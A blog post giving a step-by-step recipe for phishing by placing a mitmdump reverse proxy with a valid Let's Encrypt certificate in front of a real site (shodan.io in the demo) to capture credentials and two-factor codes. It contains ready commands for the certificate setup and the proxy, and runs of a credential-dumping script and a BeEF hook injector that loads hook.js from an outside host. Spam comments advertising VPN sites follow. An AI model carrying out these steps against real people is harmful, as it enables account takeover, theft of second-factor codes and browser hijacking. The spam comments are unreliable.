Introduction
This is going to be a quick down and dirty post on how to effectively create cloned websites on the fly by using mitmdump and letsencrypt for valid certificates. We'll use a reverse proxy in front of a site in order to create very convincing and advanced phishing campaign. This is a great way to capture two factor authentication pins and attempt automatic VPN logins.
Acquire a domain
There are plenty of different approaches when it comes to acquiring a domain for your phish. Ideally, you will want it to be very similar to your target. Alternative TLDs are an easy way to make convincing phishing attacks. You may also look into recently expired domains that can be acquired. For this tutorial, I'm going to set up blog.chokepoint.net instead of purchasing a domain for demonstration sake, and demonstrate a phish by setting up a reverse proxy for shodan.io.
CatMyFish is an excellent tool that relies on expireddomains.net in order to find potential expired domains.
Lets Encrypt!
Let's encrypt is a free, automated, and open CA that's available to anyone that owns a domain or subdomain. They have done a lot of work in helping to create secure connections for millions of websites. While they provide a great and legitimate service, it's often abused by criminals and red teams as well. Certbot is a cross platform tool for validating that you do indeed own a domain prior to issuing any certificates.
Download certbot
$ wget https://dl.eff.org/certbot-auto $ chmod a+x certbot-auto $ ./certbot-auto
Now simply run the following command, and choose "Spin up a temporary webserver (standalone)"
$ ./certbot-auto certonly
Follow the prompts for your e-mail address and domain as appropriate. Your certificates will be placed in /etc/letsencrypt/live/site.domain.here. In order to prepare the certificates for use with out reverse proxy MITM attack, simply concatenate the private key and fullchain certificates into one file.
$ sudo cat /etc/letsencrypt/live/blog.chokepoint.net/privkey.pem /etc/letsencrypt/live/blog.chokepoint.net/fullchain.pem > blog.chokepoint.net.pem
Download latest mitmproxy
Mitmproxy recently went through some large upgrade that may not have made it into your distribution's repository list yet. We'll go ahead and grab 0.18.2 using pip, as some features regarding the certificates seem to be broken in 2.* versions.
$ sudo apt-get install python3-dev python3-pip libffi-dev libssl-dev $ sudo pip3 install mitmproxy==0.18.2
Execute reverse proxy attack
$ sudo mitmdump -R https://www.shodan.io -p 443 --no-upstream-cert --cert blog.chokepoint.pem -w blog.logNotice how the URL bar has the green Secure logo and all.
Going Beyond
Here are two scripts that will help in dumping credentials as well as an example script for injecting BEEF hooks into sessions passing through the MITM.Dumping credentials
Beef injection
Running scripts
In order to execute scripts, use the -s option in mitmdump. For example:$ sudo mitmdump -R https://www.shodan.io -p 443 --no-upstream-cert --cert blog.chokepoint.pem -s ./dump_creds.py -w blog.log
$ sudo mitmdump -R https://www.shodan.io -p 443 --no-upstream-cert --cert blog.chokepoint.pem -w blog.log -s "beef_injector.py http://beef.chokepoint.net:3000/hook.js"
Thanks so much with this fantastic new web site. IĆ¢��m very fired up to show it to anyone. It makes me so satisfied your vast understanding and wisdom have a new channel for trying into the world. click here
ReplyDeleteI know your aptitude on this. I should say we ought to have an online discourse on this. Composing just remarks will close the talk straight away! What's more, will confine the advantages from this data. privacy online
ReplyDeleteRegular visits listed here are the easiest method to appreciate your energy, which is why why I am going to the website everyday, searching for new, interesting info. Many, thank you https://getmoreprivacy.com/
ReplyDeleteThis is really great work. Thank you for sharing such a good and useful information here in the blog for students. lemigliorivpn.com
ReplyDeletejust what most individuals' desire. However, most of which have no idea of the inner thoughts and multi-step means of purchasing a fresh home privacyonline.com.br
ReplyDeleteThis is an incredible rousing article.I am basically satisfied with your great work.You put truly exceptionally accommodating data... https://privacyenbescherming.nl
ReplyDeleteI definitely loved every little bit of it. I have you bookmarked your site to check out the new stuff you post. privatnostonline
ReplyDeleteIt is imperative that we read blog post very carefully. I am already done it and find that this post is really amazing. https://internetprivatsphare.ch
ReplyDeleteA debt of gratitude is in order for the significant data and experiences you have so given here... les meilleurs vpn
ReplyDeleteThis is only the data I am discovering all over the place. A debt of gratitude is in order for your website, I simply subscribe your online journal. This is a decent blog.. vpn netflix
ReplyDeleteI am all that much satisfied with the substance you have specified. I needed to thank you for this awesome article. vpnveteran.com
ReplyDeleteGreat post! Thank you for sharing valuable information. Keep up the good work...best proxy browser
ReplyDelete
ReplyDeleteGreat post! Thank you for sharing valuable information. Keep up the good work
This sounds like a very important initiative and valuable research. During my 35+ years consulting and delivering REP systems to SMEs in Finland I’ve told my customers that every business is an IT business and that the ones who realize this will succeed.lisa
ReplyDelete